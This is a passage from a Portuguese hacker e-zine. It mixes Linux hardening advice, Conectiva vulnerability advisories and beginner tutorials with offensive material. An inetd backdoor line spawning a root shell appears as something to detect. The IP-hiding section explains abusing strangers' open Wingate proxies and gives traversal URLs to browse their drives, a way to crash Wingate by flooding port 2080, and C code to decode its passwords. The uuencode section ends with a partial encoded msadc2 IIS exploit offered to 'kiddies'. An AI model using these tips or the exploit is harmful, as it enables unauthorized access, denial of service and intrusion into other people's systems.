Entre no arquivo passwd atraves de algum editor de texto, como por exemplo o vi e dps
voce procura por linhas desconhecidas, que podem ter sido inseridas pelo intruso.Proc
ure por a backdoor suidshell e inetdaemon. Para voce acha-las, siga o exemplo abaixo:
[meuhost]# grep "sh" /etc/inetd.conf
courier    stream  tcp     nowait  root    /bin/sh sh -i
Uma variacao desta pode ser feita da seguinte forma:
[meuhost]# grep "\-i" /etc/inetd.conf
swat       stream  tcp     nowait  root    /usr/sbin/swat swat -i 
O servico esta chamando o /usr/sbin/swat com os mesmos atributos do /bin/sh. Vamos co
ferir se o swat equivale a um sh:
[meuhost]# ls /bin/*sh
/bin/ash   /bin/bsh   /bin/ksh   /bin/tcsh
/bin/bash  /bin/csh   /bin/sh    /bin/zsh
[root@localhost /etc]# cmp -c /bin/ash /usr/sbin/swat
/bin/ash /usr/sbin/swat differ: char 25, line 1 is  20 ^P 220 M-^P
[root@localhost /etc]# cmp -c /bin/bash /usr/sbin/swat
[root@localhost /etc]#
Como voce pode ver, o swat eh equivalente a um sh. Para acabar com isso, 
basta comentar a linha do inetd.conf e reinicia-lo (killall -HUP inetd).


(5)- Diretorios
Vamos ir de diretorio em diretorio para fazermos algumas modificacoes.
Sendo assim, aumentarah muito a seguranca do sistema. 

[ Diretorio /etc ]-
  
- Comece olhando os arkivos /etc/inetd.conf e /etc/services em busca de 
  backdoors. Se voce ver algo estranho pode desconfiar... como servicos  
  a mais, etc.
- No /etc/exports voce NAO deve colocar um diretorio para everyone
- No /etc/hosts.deny bloqueie os servicos que voce nao quer dar acesso
- No /etc/hosts.allow libere os servicoes que voce queira liberar 

[ Diretorio /home ]

No diretorio home do root e do usuario, procure pelo arkivo .rhosts. 
Caso encontre ele, olhe o conteudo do mesmo. Caso encontre algo como
"+ +", delete ele (o .rhosts) imediatamente.

[ Diretorio /bin ]
 
No diretorio bin, procure tirar os suids bits de todos os programas 
que sao vulneraveis a buffer overflows. Como por exemplo o mount, 
ping, umount, etc.
[ Diretorio /lib ]
No diretorio /lib, pegue uma versao mais atualizada do ld.so

[ Diretorio /sbin ]
No diretorio /sbin, tire os suids bit do dip*
   
[ Diretorio /usr/bin]
No diretorio /usr/bin, tire o suid bit do at, contrab, sperl, 
splitvt e lpr

Para facilitar esse trabalho, mais abaixo voce encontra um shell
script capaz de retirar os suids bits de varios programas que sao
vulneraveis a buffer overflows...

(6)- Xwindows
Caso voce administre o seu sistema atraves do xwindows, tome muito
cuidado. Toda vez que voce entra na internet atraves do xwindows,a 
porta 6000 eh aberta, sendo assim, outros (os intrusos) podem ver
o que vc estah digitando, capturar a sua tela,executar comandos
na sua shell, etc. Portanto, eh altamente recomendavel que voce
digite o comando abaixo para nao receber conexoes externas na 
porta 6000 via UPD e TCP:

/sbin/ipfwadm -I -a deny -P tcp -o -S 0.0.0.0/0 -D 0.0.0.0/0 6000:6000
/sbin/ipfwadm -I -a deny -P udp -o -S 0.0.0.0/0 -D 0.0.0.0/0 6000:6000

Para mais informacoes, leia o texto do Nash Leon sobre Inseguranca
no Xwindows, no seguinte site: http://unsekurity.virtualave.net/

(7)- Anti Suid Script
Eh altamente recomendavel tirar os suid's de alguns
programas pois voce corre risco de alguem obter root
no seu sistema. Portanto, utilize o shell script abaixo
para fazer o nosso trabalho (q eh tirar os suid's de
alguns programas):

Creditos:
   Esse script foi feito pela Sekurity inc.,
(www.sekurity.org) 

------------------------ anti-suid.sh - cut here ------------------------
#!/bin/sh
# sekurity.org   Anti SUID script   1.0
# slakware96 install - no x-windows - after ssh install - 41
# suid binaries
#
# in case you need to find all suid binaries on your system
# 
# find / -user root \( -perm -4001 -o -perm 2001 \) -exec -ldb {}
# \; >> /root/sekurity.audit
#
#
chmod 755 /usr/bin/at
chmod 711 /usr/bin/crontab
chmod 711 /usr/bin/splitvt
chmod 711 /usr/bin/chsh
chmod 711 /usr/bin/newgrp
chmod 711 /usr/bin/chfn
chmod 755 /usr/bin/dumpreg
chmod 755 /usr/bin/restorefont
chmod 755 /usr/bin/restorepalette
chmod 755 /usr/bin/restoretextmode
chmod 711 /usr/bin/procmail
chmod 711 /usr/bin/lpq
chmod 711 /usr/bin/lpr
chmod 711 /usr/bin/lprm
chmod 755 /usr/bin/rcp
chmod 755 /usr/bin/rlogin
chmod 755 /usr/bin/rsh
chmod 755 /usr/lib/svgalib/fun
chmod 755 /usr/lib/svgalib/mousetest
chmod 755 /usr/lib/svgalib/scrolltest
chmod 755 /usr/lib/svgalib/speedtest
chmod 755 /usr/lib/svgalib/testgl
chmod 755 /usr/lib/svgalib/testlinear
chmod 755 /usr/lib/svgalib/vgatest
chmod 755 /usr/lib/svgalib/3d
chmod 755 /usr/lib/svgalib/keytest
chmod 755 /usr/lib/svgalib/accel
chmod 755 /usr/lib/svgalib/eventtest
chmod 755 /usr/lib/svgalib/forktest
chmod 755 /usr/lib/svgalib/testaccel
chmod 711 /usr/sbin/pppd-2.1
chmod 711 /usr/sbin/pppd-2.2
chmod 711 /usr/games/sasteroids
chmod 755 /bin/mount
chmod 755 /bin/umount
chmod 711 /sbin/dip-3.3.7n
chmod -s /usr/X11R6/bin/color_xterm
chmod -s /sbin/dip
chmod -s /usr/games/doom/startmouse
chmod -s /usr/bin/dos
chmod -s /sbin/dump
chmod -s /usr/games/lizardlib/lizardshi
chmod -s /bin/mount
chmod -s /bin/umount
chmod -s /usr/bin/mh/inc
chmod -s /usr/bin/mh/msgchk
chmod -s /usr/bin/resizecons
chmod -s /usr/X11R6/bin/rxvt
chmod -s /usr/X11/bin/SuperProbe
chmod -s /usr/local/bin/workman
chmod -s /usr/lib/games/abuse/abuse.console
chmod -s /usr/X11R6/bin/X

------------------------ anti-suid.sh - cut here ------------------------


8)- Conclusao
Bom administradores leigos, espero ter ajudado voces. Procure sempre
obter as ultimas falhas encontradas e como arruma-las. Assine uma li
sta de discursao tb, como por exemplo a bugtraq e a bos-br. Sempre
atualize os programas do seu sistema, nao tenha preguica. Ah! Nao
esqueca de instalar programas para aumentar a seguranca da sua rede.
Programas como ipchains, portsentry, tcp_wrappers (leia setor 07),etc,
nao pode deixar de faltar.   

 						            
								              Gotoxy
					                                gotoxy@zines-br.com
.:x| ----------------------------------------------------------------------------- |x:.









SETOR [09]
==[ Vulnerabilidades ]==
==[ Por Gotoxy       ]==
-------------------------------------------------------------------
Abaixo segue 4 das vulnerabilidades encontradas no Conectiva Linux.
Como prometido, disponho aqui mais algumas vulnerabilidades......:)
-------------------------------------------------------------------

					==[ Vulnerabilidade #1 ]==

Pacote: apache 
Resumo : Vulnerabilidade em mod_rewrite e cabecalho Host
Data:    2000
Edicoes : 4.0, 4.0es, 4.1, 4.2, 5.0, prg graficos, ecommerce, 5.1 

DESCRICAO DO PROBLEMA: 
Existem duas vulnerabilidades no pacote do servidor web Apache enviado 
com o Conectiva Linux. 

1) Existe uma vulnerabilidade no modulo mod_rewrite enviado junto com o 
servidor web Apache que,em algumas configuracoes, poderia ser usada para 
ler qualquer arkivo no sistema (desde que o usuario do servidor web tenha 
permissoes para isto). A vulnerabilidade aparece em regras de reescrita do 
tipo: 

RewriteRule /test/(.*) /home/$1 

Ou seja, o resultado aponta novamente para algum lugar no sistema de 
arquivos. A versao anterior do modulo iria substituir uma URL do tipo 
http://servidor/test/%25{TIME}, por exemplo, por um acesso ao arquivo 
/home/conteudo-da-variavel-TIME A versao atualizada do modulo contida 
nos pacotes novos  fornecidos  faz  a  expansao  em um unico passo  e 
nao apresenta mais esta vulnerabilidade.  Para  esta  vulnerabilidade 
poder ser explorada,  um atacante precisaria saber  de antemao  que o 
modulo mod_rewrite estah sendo usado e quais URLs sao reescritas  por 
este modulo.
mod_rewrite esta por padrao desabilitado no Conectiva Linux. 

2) A segunda vulnerabilidade estah presente em algumas configuracoes 
de dominios virtuais em massa. Uma requisicao poderia conter um campo 
Host: com caracteres "." no nome, o que poderia permitir  o acesso ao 
diretorio pai (..). O tratamento desta situacao nao estava sendo feito
corretamente e foi corrigido nesta atualizacao. 

SOLUCAO: 
Eh recomendado que usuarios que se enquadrem em uma das duas vulnerabilidades 
listadas atualizem os seus servidores web apache. usuarios do Conectiva Linux 
4.1 e 4.2 tb encontrarao no FTP a versao 1.3.12 do Apache.Esta versao pode ser 
usada por aqueles que atualizaram para 1.3.12 segundo o  anuncio do IMP/HORDE 
feito anteriormente.


					==[ Vulnerabilidade #2 ]==

Pacote:  gnorpm 
Resumo:  Uso inseguro do diretrio /tmp 
Data:    2000
Edicoes: 4.0, 4.0es, 4.1, 4.2, 5.0, prg graficos, ecommerce, 5.1 

DESCRICAO DO PROBLEMA:
Gnorpm versoes anteriores a 0.95 usam o diretorio /tmp de forma insegura,
permitindo um ataque do tipo symlink que, se gnorpm for rodado como root, 
pode sobreescrever qualquer arquivo no sistema. 

SOLUCAO:
Todos os usuarios do gnorpm devem fazer a atualizacao. Alem de corrigir o 
problema de seguranca, esta versao corrige varios outros problemas. Os 
arquivos necessarios para a atualizacao sao diferentes dependendo da versao 
do Conectiva Linux utilizada. Todas as versoes anteriores a 5.1 precisarao 
tambem atualizar o RPM, e este deve ser o primeiro pacote a ser atualizado. 
Apos isso, deve ser rodado o comando: rpm --rebuilddb E entao os pacotes 
restantes podem ser instalados. 


					==[ Vulnerabilidade #3 ]==

Pacote:  lpr 
Resumo:  Possvel obtencao de root local 
Data:    2000
Edicoes: 4.0, 4.0es, 4.1, 4.2, 5.0, prg grficos, ecommerce, 5.1 

DESCRICAO DO PROBLEMA 
O pacote lpr eh usado para gerenciar a impressao em uma maquina linux. 
Foi encontrado um problema no daemon lpd que poderia ser usado p/ obter 
root local na maquina. O problema eh uma chamada incorreta a funcao 
syslog() com o jah classico erro de string de formato (format bug). 

SOLUCAO:
Apesar de nenhum exploit ter sido tornado publico ateh o momento, 
recomendo a todos os users a fazerem a atualizacao do pacote.


				==[ Vulnerabilidade #4 ]==

Pacote:  tmpwatch 
Resumo:  tmpwatch pode ser usado para provocar um DoS 
Data:    2000
Edicoes: 4.0, 4.0es, 4.1, 4.2, 5.0, prg graficos, ecommerce, 5.1 

DESCRICAO DO PROBLEMA: 
O pacote tmpwatch eh responsavel por remover arquivos muito 
antigos de diretorios temporarios. Versoes distribuidas com 
o Conectiva lnx criavam um novo processo a cada subdiretorio 
encontrado. Ao criar centenas de subdiretrios, um atacante 
local poderia  provocar  uma  carga  muito  alta na maquina. 
Algumas versoes do tmpwatch tambem contem uma opcao --fuser 
que era usada  de forma  insegura,  permitindo que comandos 
embutidos em nomes de  arquivos  fossem  executados, o  que 
poderia ser usado para obter privilegios de root na maquina. 
*Nenhuma* destas versses foi distribuda com o Conectiva lnx. 

SOLUCAO:
Todos os usuarios devem atualizar o pacote tmpwatch. Esta 
atualizacao corrige o comportamento do programa para evitar 
o DoS e tb incorpora, mas de forma segura, a opcao --fuser 
mencionada anteriormente. 



Fim de vulnerabilidades!
    Espere a nossa proxima edicao do ZiNeS-Br para conferir mais 
VuLnErAbiLiDaDeS !


							                    Gotoxy
					                                gotoxy@zines-br.com
.:x| ----------------------------------------------------------------------------- |x:.







SETOR [10]
==[ Escondendo ip no mirc ]==
==[ Por Gotoxy            ]==

					Metodo 1: BnC
 bnc = bouncer :)
 Ae! Voce jah deve ter ouvido alguem falar sobre bnc no irc, nao? Se voce jah sabe 
 o que eh, nao perca tempo lendo esse texto! Porem, se voce nao sabe o que eh  um 
 boucer, recomendo voce ler isso e fazer parte da eleet :) ! 

 -O que eh um BNC?-

 BNC eh um um imenso servidor de proxy, q permite que os usuarios se conectem a uma conta 
 shell, ficando protegidos de nukes, invasoes,etc. Tem muitas razoes para os mircmaniacos
 usarem bnc. Algumas usam bnc por questao de segunranca, "escondendo" seu ip, assim fican
 do livres dos lamma que adoram nukar, outras pq nao possuem acesso direto a internerd...
 Etc

 -Eu jah tenho uma shell, onde posso downloadar bnc?-

 Voce pode downloadar o bnc do seguinte site: http://www.efnet.org/archive/bouncers/bnc
 O winbnc.zip eh para Win 9x/Winnt
 Versoes com extensao .tar, .gz, ou desse tipo sao para linux (bah)

 -E depois?-

 Depois voce deve fazer o upload do bnc de acordo com o SO do servidor e logo
 depois voce deve compila-lo (caso seja linux)! 

 -Como compilar bnc?-
 
 Com o bnc no diretorio /home, voce deve descompacta-lo com a seguinte sintaxe:
 tar -xvf bnc2.6.2.tar 
 Depois voce entra no diretorio do bnc:
 cd bnc2.6.2
 Logo, voce precisa digitar:
 ./configure
 Agora, voce deve digitar o comando abaixo para compilar o bnc!
 make
 Como nosso proximo passo, voce deve digitar o comando abaixo!
 ./bncsetup
 
 -Como configurar?-
 A maioria da configuracao esta incluida no arquivo de configuracao 'bnc.conf' que fica
 lozalicado no diretorio corrente. Eh necessario voce saber que se nao estiver presente
 esse arquivo, o bnc nao funcionara. Todos os 'requerimentos' sao explicados no arquivo
'example.conf' contido nas atuais versao do bnc. 

 -CronTab- 
 
 BNC inclui um script chamado bncchk que usa o arquivo pid criado pelo executvel da BNC 
 para determinar se ela esta agindo ( funcionando). O arquivo bncchk precisa ser editado 
 e modificado: 

					     BNCBIN=bnc 
				       BNCPIDFILE=pid.bnc 
		                 BNCPATH=/home/bnc2.6.2
		  /* O nome do diretorio criado basicamente eh esse! */

 No editor do bncchk deve estar essa linha: 
 0,10,20,30,40,50 * * * * /home/roots/bncchk >/dev null 2>&1 

 Esta linha vai fazer uma verificacao a cada 10 minutos para ver se BNC esta rodando, se 
 ela nao estiver, ela vai tentar recomear a BNC com as informacoes das variaveis contidas 
 no arquivo bncchk. 

 -E por fim-
 
 Digite: ./bnc 
 Para rodar o bnc!
 Com o bnc rodando na shell, voce entra no seu mirc e digita:
 /server suashell.com.br porta
 Exemplo:
 /server cyberspace.org 9000 /* A porta eh definida no arquivo bnc.conf */
 Depois, voce tem que digitar o password! Com a seguinte sintaxe:
 /quote pass password
 Exemplo:
 /quote pass 123uu
 E por fim, voce digita o host onde vai conectar! A sintaxe eh esta:
 /quote conn [servidor] <porta> <password>
 Exemplo:
 /quote conn irc.matrix.com.br 6667 mypass 
 
 -Ultimas palavras-

 Existem muis bncs espalhados por ai! O que voce tem que fazer eh ir trocando com
 os mirkeiros! Um bom lugar para se trocar bnc, eh no servidor irc.dal.net  e  no
 canal #bnc 
 
 Obs: Este servidor eh americano, portanto, se voce nao sabe falar ingles,esqueca! 
 Dica: entre no #bnc e digite: i wanna trade bnc! msg-me
 Traduzindo: Eu quero trocar bnc! pvt-me
 O resto, fica por conta sua! :) 

 Eh isso ae mircmanianos, se voce nao sabia do esquema de BNC, agora sabe! 
 Divirta-se!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 
 						Metodo 2: Wingate
 -O que eh Wingate?- 

 Wingate eh um programa que permite que vc divida uma conexao discada ou direta a Internerd 
 com varios computadores. Assim, se vc tem uma rede de computadores e um deles tem um modem 
 ligado a uma linha telefonica, voce pode utilizar o Wingate nesse micro para que  todos os 
 micros de sua rede acessem a Internet, atraves de uma unica conexao discada, um unico IP.
 
 Enfim, o Wingate tranforma o "computador mae" em um gateway a Internet, por onde passam 
 os dados de todos os outros micros da rede.Portanto,o wingate funciona como um servidor 
 Proxy  e uma "firewall"

 -Procurando Wingates-

 Logicamente, primeiramente voce deve achar um computador rodando o programa. Certamente,
 o wingate vai estar  rodando em uma makina windows 9x ou  um windows nt.  Como primeiro  
 passo, vamos pegar um scaneador de wingate. Os programas que  scaneiam wingates, apenas 
 conectam em um determinado ip pela porta 23 e, caso a conexao seja estabelecida, "olha"
 se a seguinte string "Wingate>" apareca. Caso apareca, esta makina esta com  o  wingate
 instalado.  Entao, o programa avisa a voce! (duh)

 Ahh!  Caso   esteja  no  windows,  pegue  o  wGateScan   no   seguinte  site: 
 [ http://packetstorm.securify.com ]. Caso esteja de linux, entre no RootShell 
 e procure por "wingate".Ou entao,use o wgate.c mesmo! Foi feito pelo os manow 
 da Rwx. 

 -E depois?-
 
 Bom, depois que voce achar uma makina rodando o wingate, voce entra no mirc e digita:
 /server ip_do_wingate 23
 
 Exemplo:
 /server 200.200.200.200 23
 
 Vai aparecer umas merdas lah e depois voce digita:
 /raw irc.server.com.br porta
 
 Exemplo:
 /raw irc.matrix.com.br 6667

 Quando voce receber o aviso de conexao estabelecida, digite os comandos abaixo:
 /raw user <nome de usuario> <email> <UID> <digite qualquer coisa

 Exemplo:
 /raw user Meunome gotoxy@zines-br.com 0

 E depois:
 /raw nick <meu nick>

 Exemplo:
 /raw nick Gotoxy

 -Ultimas palavras e 3 dicas-

 Simples, nao? Tb achei :)
 Se voce pensar um pouco, vai perceber que podemos tirar muito mais proveito do wingate.
 Podemos nos logar em outros hosts atraves do wingate onde,  nosso IP nao sera logado e
 sim o do wingate. etc, etc! 

 -Dicas-					
 Dica 1: Para voce ver o conteudo da makina rodando o wingate, digite no browser:
 http://www.server.com:8010/c:/   - NT/Win9x 
 http://www.server.com:8010//     - NT/Win9x 
 http://www.server.com:8010/..../ - Win9x 
 
 Dica 2: Para voce travar o wingate, voce deve conectar na porta 2080 dele e depois
 enviar 2000 caracteres e depois desconectar. :) 

 Dica 3: Para voce descriptar o password, aqui esta um pequeno e util codigo fonte
 escrito em C:

 <<<<<<<<<<<<<<<<<<<cut here>>>>>>>>>>>>>>>

 #include "stdafx.h" 
 #include <stdio.h> 
 #include <string.h>

 main(int argc, char *argv[]){ 
 char i; 

 for(i = 0; i < strlen(argv[1]); i++) 
 putchar(argv[1][i]^(char)((i + 1) << 1)); 
 return 0; 
 } 
 <<<<<<<<<<<<<<<<<cut here>>>>>>>>>>>>>>>>>>
 
 
					Metodo 2.1: Socks Proxy
 
 Coloquei como sendo 'Metodo 2.1', pois ainda faz parte do metodo de  wingate
 Esse eh o metodo mais facil. Bastando apenas voce achar uma makina rodando o
 wingate.  voce entra no mirc e na parte de configuracoes,  voce  seleciona a 
 opcao de Firewall. Deixe selecionado o protocolo Socks4 mesmo, q esta introd
 uzida na versao 1.1 e 2.1 do wingate e o protocolo Socks5 apenas esta introd
 uzida na versao 2.1 do wingate. Na caixa de texto HOSTNAME,voce deve colocar
 o dns ou ip do wingate.E na caixa de texto PORT,coloque a porta sendo a 1080
 Pronto! Agora voce jah pode conectar tranquilamente no servidor e quando uma
 pessoa der um whois em voce ou um /dns nick (para ver o ip), serao mostradas
 as informacoes e o ip do wingate! :) A conexao fica meio lenta mas tah limpo  
 

							Th3 3nd


								               Gotoxy
					                                 gotoxy@zines-br.com
.:x| ----------------------------------------------------------------------------- |x:.





  



SETOR [11]
==[ Cursinho de Linux - Parte 1 ]==
==[ Por Gotoxy                  ]==

Indice
     1. Introducao
     2. Acesso Remoto   
     3. Permissoes
     4. Montando
     5. Conclusao


1. Introducao

Eae macacada!!

  Vou ensinar algumas coisas de linux que podem ser uteis para voce 
e para toda a familia. =]
  Para os que nem sabem o que eh linux,nao eh recomendavel que voce 
leia. Mas, resumidamente falando (para os users que nao sabem), lnx
(linux) eh um sistema operacional. :) Espero que saibam o que eh SO
  Para quem esta muito avancado em linux,nao eh necessario a leitura
deste. Portanto, este tutorial vai para o usuario intermediario. 
  Obs para os iniciantes: SO = Sistema Operacional =]


2. Conexao Remota

  O Telnet eh uma das formas mais conhecidas para acesso remoto no linux.
Geralmente o servico de telnet vem habilitado no linux (atraves do inetd)
Abaixo, vou ensina-los como desabilitar esse servico, no caso de voce nao
querer q nenhuma makina conecte ao seu sistema.

Desabilitando:
  Simples, basta voce entrar no diretorio /etc e editar o arquivo inetd.conf
e depois localizar a linha: telnet  stream  tcp  nowait  root /usr/bin/tcpd
Depois de lozalizada, basta voce colocar o simbolo # no inicio dessa linha.
O simbolo # tornara a linha citada a cima um comentario, sendo assim, essa 
linha nao sera interpretada. Caso queira desabilitar o servico de ftp, basta
colocar o simbolo # no inicio da linha. Para desabilitar qquer servico basta
apenas colocar o simbolo # do inicio da linha. =]
  Ainda nao acabou! Agora, devemos reiniciar o processo para que as alteracoes
tenham efeito, pois o inetd eh um arquivo de configuracao. Para isso, vamos
utilizar o comando ps para listar o numero do processo, ou seja, o PID.

Exemplo:
[meuhost]# ps -ef | grep inetd
root     305     1  0  19:53 ?     00:00:00 inetd
root     477   426 10  20:24 tty1  00:00:00 grep inetd

  O processo 477 eh justamente o grep q voce acabou de digitar. Nao se preocupe
com esse processo pois o PID do inetd eh 305, conforme voce confere no exemplo.
  Para reiniciar o processo utilize o comando kill seguido de -HUP e o PID.
[meuhost]# kill -HUP 305
  Pronto! Agora ninguem podera ter acesso ao seu sistema atraves da porta 23,
ou seja, atraves do servico de telnet.   

 
3. Permissoes
 
  Eh verdade que esse esquema de permissoes eh complicado, porem, depois que 
voce acabar de ler esse setor, voce vai entender tudo direitinho. 

Sintaxe: chmod ABC none_do_dir_ou_aquivo

Exemplo: chmod 764 exemplo.txt

A: permisso do proprietrio 
B: permisso do grupo 
C: permisso para qualquer outro usuario

Valores para A, B e C:

0 = nenhuma permissao
1 = permissao de execucao
2 = permissao de gravacao
3 = permissao de execuo e gravacao
4 = permissao de leitura 
5 = permissao de leitura e execucao
6 = permissao de leitura e gravacao 
7 = permissao de leitura, gravacao e execucao

  Pronto! Agora voce eh um expert em permissoes..:)

4. Montando

  Agora voce vai aprender a montar o cdrom, disquete e uma outra particao como
por exemplo de windows.

-+{ Montando o drive de Cdrom }+-

  Simples! Coloque um cdrom dentro do drive de cdrom (duh) e depois digite o
seguite comando:
  [meuhost]# mount /mnt/cdrom
  Se nao der nenhuma mensagem de erro voce apenas digita: cd /mnt/cdrom
  Caso ocorra um erro, digite o seguinte comando:
  [meuhost]# mount /dev/cdrom /mnt/cdrom
  Caso ocorra outro erro, digite o seguinte comando:
  [meuhost]# mount -t iso9660 /dev/cdrom /mnt/cdrom
  Entao eh isso! Espero q nao ocorra mais nenhum erro.

-+{ Montando o drive de Disquete }+-
  
  Tb eh muito simples... nossa primeira tarefa eh colocar um disquete dentro do
drive de disquete (+ um duh) e depois digitar o seguinte comando:
  [meuhost]# mount /mnt/floppy
  Caso nao ocorra erro, basta digitar: cd /mnt/floppy
  Caso ocorra erro, entre com o seguinte comando:
  [meuhost]# mount /dev/fd0 /mnt/floppy
  Pronto! Agora deve funfa...

-+{ Montando um particao fat }+-

  Abaixo vou descrever como voce deve proceder para acessar uma particao
windows, caso vc tenha uma outra particao rodando o win no hd.
  Passo 1: crie um pasta chamada win dentro do dir /mnt.
  [meuhost]# mkdir /mnt/win
  Obs: pode ser outro nome! =]
  Passo 2: Digite o seguinte comando:
  [meuhost]# mount -t vfat /dev/hdXn /mnt/win
  Onde:
  X = dispositivo que referencia o hd
  n = a particao desse hd a ser montada
  hda - hd master da ide0
  hdb - hd slave na ide0
  hdc - hd master na ide1
  hdd - hd slave na ide1
  Abaixo segue um exemplo, para deixar mais claro o q foi dito acima:
  [meuhost]# mount -t vfat /dev/hda1 /mnt/win
  Pronto! Basta acessar do seguinte modo:
  [meuhost]# cd /mnt/win


5. Conclusao
  
  Pronto macacada!
  Chegamos ao final da primeira parte do nosso 'Cursinho de Linux'. Espero ter
  ajudado a todos voces...
  Esperem a proxima edicao do Zines-br para voce obter a segunda parte do nosso
  cursinho! Obs: nao sei pq estou lhes chamando de macacada. =] Nao se sintam
  ofendidos por causa disso... =] macacada???   
  
                                                            Gotoxy
					                              gotoxy@zines-br.com
.:x| -------------------------------------------------------------------------- |x:.









SETOR [12]
==[ UUENCODE e UUDECODE ]==
==[ Por Gotoxy          ]==

UUENCODE: serve para codificar arquivos binarios 
UUDECODE: serve para descodificar arquivos uuencodados pelo o uuencode
  
Ambos sao encontrados em varios compactadoress e descompactadores do sistema 
operacao Windows, como por exemplo, o famoso Winzip. Na verdade, nao sei se
o uuencode e o uudecode estao em varios compactadores, pois, soh vi ele no
winzip. Mas, eh provavel a existencia dele nos demais compactadores. No linux
tb se encontra eles. Abaixo, vou mostrar como voce deve fazer para uuencodear
e uudecodear um arquivo binario, utilizando o winzip (caso esteja no windows)
e o linux.

-[ Winzip ]-
  Vou mostrar aqui de como voce deve proceder para codificar e decotificar 
um arquivo utilizando o winzip.
  Para voce codificar, primeiramente voce deve comprimir o arquivo que 
deseja uuencodear. Depois que voce compactar o arquivo escolhido por voce,
basta clicar duas vezes nele. O Winzip se abrira com o arquivo e aih voce
seleciona o arquivo e depois clica no menu 'Actions' (do lado da opcao 'File')
e em seguida clica em UUencode. Sera feito uma pergunta pelo winzip se voce
deseja realmente uuencodear o arquivo. Clique em OK. Sera criado um outro
arquivo compactado com o mesmo nome, porem, com mais bytes e com extensao .uue
Pegue esse arquivo e leve para um outro diretorio e depois entre no promtp do 
msdos e entre no mesmo diretorio onde esta localizado o uuencodeado e digite:
c:\windows\arquivos\uuencodeados\> ren teste.uue teste.txt
start teste.txt
Onde: 
c:\windows\arquivos\uuencodeados\>: eh o dir onde voce colocou o file
teste.uue: eh o nome do arquivo q foi uuencodeado
start teste.txt: sera iniciado o arquivo
Legal que ficou neh?! Tudo centralizado...super massa! Depois para voce
uudecodear, basta renomea-lo com extensao .uue  O comando para renomear
eh o ren. Sintaxe: ren [nome.extensao] [nome-novo.extensao]
c:\windows\arquivos\uuencodeados\> ren teste.txt teste.uue
start teste.uue
O Winzip se abrirah com o arquivo uuencodeado!

-[ linux ]-
  Aqui vou mostrar como voce deve fazer para uuencodear e uudescodear
utilizando o linux. Primeiramente, veja se voce tem eles instalados
no seu sistema. Digite uuencode ou uudecode. Caso voce tenha, tudo bem
caso contrario, eh necessario instala-lo. Coloque o cdrom de alguma
distribuicao de lnx no drive de cdrom e procure pelo pacote sharutils. 
Caso nao tenha nenhum cdrom de alguma distribuicao linux, procure ele 
pela net. Um exemplo do que voce tem que fazer para instalar o pacote 
sharutils:

[meuhost]# cd /mnt/cdrom
[meuhost]# cd Mandrake
[meuhost]# cd RPMS
[meuhost]# ls -la sharutils*
...    ...    ...   ...    sharutils-4.2.1mdk.i586.rpm 
[meuhost]# mkdir /root/programas
[meuhost]# cp sharutils-4.2.1mdk.i586.rpm /root/programas
[meuhost]# cd /root/programas
[meuhost]# rpm -ivh sharutils-4.2.1mdk.i586.rpm
sharutils         ##############################
[meuhost]# uu [TAB]
uudecode     uuencode    
[meuhost]# echo blza! Agora temos eles!
blza! Agora temos eles!
[meuhost]# halt

Esse exemplo foi feito em um MDK (Mandrake) =]
Depois que os dois estiverem jah instalados, vamos para a nossa 
segunda parte. Vamos comecar falando do uudecode. Para utiliza-
lo, basta voce digitar: uudecode [arquivo]
Onde: [arquivo] eh o nome do arquivo uuencodeado
Para voce uuencodear, basta voce comprir o arquivo, utilizando
por exemplo o compactador/descompactador tar e depois digite:
uuencode -m [arquivo]
Onde: [arquivo] eh o nome do arquivo q serah uuencodeado

Um exemplo de arquivo uuencodeado! Esse aqui vai para o kiddies
que adoram um nt bugado =]. Caso nao saiba do ataque de rds,
olhe a edicao 00 do zinesbr.

########################## MSADC2.PL ##########################


_=_ 
_=_ Part 001 of 001 of file msadc2.zip
_=_ 

begin 666 msadc2.zip
M4$L#!!0````(`-FY-RFR&7AW4!8``,-#```)````;7-A9&,R+G!LS%M[5]O&
MMO_;^A0;08*=^(%-R&IM3$,A;5FG@5Q,TIQ&U$N6!JR#+*D:B<<EY+/?WYZ1
M9!D;0M)R>KW`EC1[9O;LV>\]6EYJI3)NC;R@%8G8-Y:-97HSV-[=:1WN#F@U
ME?:I6*6J?6:3N(S\T$MJ))W8BQ(Z%['TPH`ZW*DRNJ+8]@(Z"6,A$XK2*+I2
M#0VR75>X]&Y_AR2>AG%2IUC8OG]%KN<&JPDYOK`#2B-R0E?4:90F%([I0OB^
M8:12T"!TSD32([[^621AE'2[@\3M&:?J1E9-T3UWN^/NA\/W^Q=.VI5=LT[6
M$SL^E;6>842Q%R1D-AK$BY(3VSFC\PXUYC&F%FWOOL'WA1>+!,ND1L,*3(SA
MG5!UR14G7H"UK/#(U^,;>OJ4;CT\O*G1=3;CGW]^-MXQ!;LTD;;K-".?&F/:
M'(<RV:)K:KBTZ0K?OMJBQ@=JG-.-49FV5RI]XBNZ"E.ZL#%>$H+VH%05>(4Q
MN>$$^-?0!^-(X82!*[>XEQJ31B*Y$"(@!Z26=3P\L5,_H39I4'3[4%'0Z22B
MO<`5ES00,7:5(CL94V*/?&P&UFV?VY[/=^BRK[K\F8KXBMZ/?DSEP>@_3$':
M%\F/>P<#"NP)P[U7<+QA!907R$38+H4GM.TDWKG8M1/[)]M)PO@*/<Y5#TP_
M"B6/(-2]N$Q$'-@^6`5]PL#&O">>+]2<&"^B#<"FM&GAP]2R+#FV8V%9#+65
MX<"\Q_<`O5##_N8%;G@AZ?N-,EKYT_TC`#H:GS:8<@*">"//]Y(KJB;C6`@]
MM2(#TU_29I!.1B)6Y(_3@,(`[*V`\A;#J!S$9%/C$,SE^Q`!F4X$'E3/.S6>
M9&('+O9&LE`9QN<>UNXEO1O#6/[V#Z09>WWBG9(+8AO&*S<&X66_:CIFW73Q
M+_!_@O]3_(]-EI97\DJZ7LQ`%UX0)&A0O^L;TZNVOM3?3#/5<QDRJSEU]<)S
M''L51(\EQ'TD')OW`<RD:-*AB>T*2L:"=@?[8+)D5;).<*^8QT]#X"D#C0"&
M@2R;V^[Y;V%\)ODZ2D?J=T?$R>`\5I<_;4>1[SDV\P@:C8KIG(A+>Q+Y0L/^
M]%,8IY/L^A#J9\*7SHD,O"@2B6IXM_U&=1W902#4N/I*-=JN^H%JW!63,+L\
M@N;(EIZ,/4GXDY$=2S%=\Q[DE)7<61!>,)-AFZ\4C2?N"$NLF)8%M.,P!.OR
